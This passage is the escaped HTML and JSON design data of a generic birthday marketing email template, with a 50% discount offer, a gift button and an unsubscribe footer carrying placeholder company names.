class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #ffffff;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #ffffff;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #ffffff;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px 10px;background-color: rgba(255,255,255,0)\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #b5e0ff;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px 10px;background-color: rgba(255,255,255,0);\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #b5e0ff;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502084290319-loskjo_03.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 227px;\\\" width=\\\"227\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:16px 20px 8px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"font-size: 48px; line-height: 57.6px; font-family: Raleway, sans-serif;\\\">Happy Birthday!<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:22px 0px 0px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502083809895-123111_11.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 564px;\\\" width=\\\"564\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 20px 14px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-size: 30px; line-height: 36px;\\\">We&rsquo;re going to help you celebrate.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 130%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 130%;\\\"><span style=\\\"font-size: 16px; line-height: 20.8px;\\\">Your birthday comes around only once a year,<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 130%;\\\"><span style=\\\"font-size: 16px; line-height: 20.8px;\\\">so let&rsquo;s give it the attention it deserves.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #e34c1e; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\">As our gift to you, enjoy 50% off any product<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\">line for the next 30 days.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 16px; line-height: 22.4px;\\\">That&rsquo;s right! It&rsquo;s not just your birthday,<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 16px; line-height: 22.4px;\\\">but we&rsquo;re celebrating you for a whole month!<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 20px 25px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-spacing: 0; border-collapse: collapse; mso-table-lspace:0pt; mso-table-rspace:0pt;font-family:\'Raleway\',sans-serif;\\\"><tr><td style=\\\"font-family:\'Raleway\',sans-serif;\\\" align=\\\"center\\\"><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:54px; v-text-anchor:middle; width:300px;\\\" arcsize=\\\"18.5%\\\" strokecolor=\\\"#ffffff\\\" strokeweight=\\\"2px\\\" fillcolor=\\\"#e34c1e\\\"><w:anchorlock\\/><center style=\\\"color:#FFF;font-family:\'Raleway\',sans-serif;\\\"><![endif]-->\\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Raleway\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFF; background-color: #e34c1e; border-radius: 10px;-webkit-border-radius: 10px; -moz-border-radius: 10px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;border-top-color: #ffffff; border-top-style: solid; border-top-width: 2px; border-left-color: #ffffff; border-left-style: solid; border-left-width: 2px; border-right-color: #ffffff; border-right-style: solid; border-right-width: 2px; border-bottom-color: #ffffff; border-bottom-style: solid; border-bottom-width: 2px;\\\">\\r\\n      <span style=\\\"display:block;padding:13px 22px;line-height:120%;\\\"><span style=\\\"font-size: 24px; line-height: 28.8px;\\\">PICK YOUR GIFT NOW!<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><\\/td><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px 10px;background-color: rgba(255,255,255,0)\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px 10px;background-color: rgba(255,255,255,0);\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 20px 20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #9c9c9c; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">We hope you have the happiest of birthdays!<\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 160%;\\\">&nbsp;<\\/p>\\r\\n<p style=\\\"line-height: 160%; font-size: 14px;\\\">Here&rsquo;s to you,<\\/p>\\r\\n<p style=\\\"line-height: 160%; font-size: 14px;\\\">The Your Company&nbsp;Team<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 30px;background-color: #f0f0f0\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 30px;background-color: #f0f0f0;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Raleway\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Raleway\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">You received this email because you signed up for My Company Inc.<\\/span><\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\">&nbsp;<\\/div>\\r\\n<div style=\\\"font-family: arial, helvetica, sans-serif;\\\"><span style=\\\"font-size: 12px; color: #999999; line-height: 14.4px;\\\">Unsubscribe<\\/span><\\/div>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":3,\\\"u_column\\\":3,\\\"u_content_text\\\":7,\\\"u_content_image\\\":2,\\\"u_content_button\\\":1},\\\"body\\\":{\\\"id\\\":\\\"HDOGiwkIxE\\\",\\\"rows\\\":[{\\\"id\\\":\\\"KNn2IkDtuO\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"julHtOUC1g\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3-3CKFHN4i\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502084290319-loskjo_03.png\\\",\\\"width\\\":227,\\\"height\\\":55,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LEtaulhFnc\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"16px 20px 8px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><strong><span style=\\\\\\\"font-size: 48px; line-height: 57.6px; font-family: Raleway, sans-serif;\\\\\\\">Happy Birthday!<\\/span><\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"tuC8jtkrU2\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"22px 0px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/a.mailmunch.co\\/user_data\\/landing_pages\\/1502083809895-123111_11.png\\\",\\\"width\\\":564,\\\"height\\\":264,\\\"maxWidth\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"},\\\"url\\\":\\\"\\\",\\\"target\\\":\\\"\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"_yWQaOKSNP\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 20px 14px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 120%;\\\\\\\"><span style=\\\\\\\"font-size: 30px; line-height: 36px;\\\\\\\">We&rsquo;re going to help you celebrate.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"kURoAPqVAo\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"130%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 130%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 20.8px;\\\\\\\">Your birthday comes around only once a year,<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 130%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 20.8px;\\\\\\\">so let&rsquo;s give it the attention it deserves.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"PW76nWc_W4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#e34c1e\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\">As our gift to you, enjoy 50% off any product<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\">line for the next 30 days.<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"Amrqr7NZSm\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 22.4px;\\\\\\\">That&rsquo;s right! It&rsquo;s not just your birthday,<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 16px; line-height: 22.4px;\\\\\\\">but we&rsquo;re celebrating you for a whole month!<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"TUNML5vDHq\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 20px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":\\\"\\\",\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFF\\\",\\\"backgroundColor\\\":\\\"#e34c1e\\\",\\\"hoverColor\\\":\\\"#bf3b13\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"13px 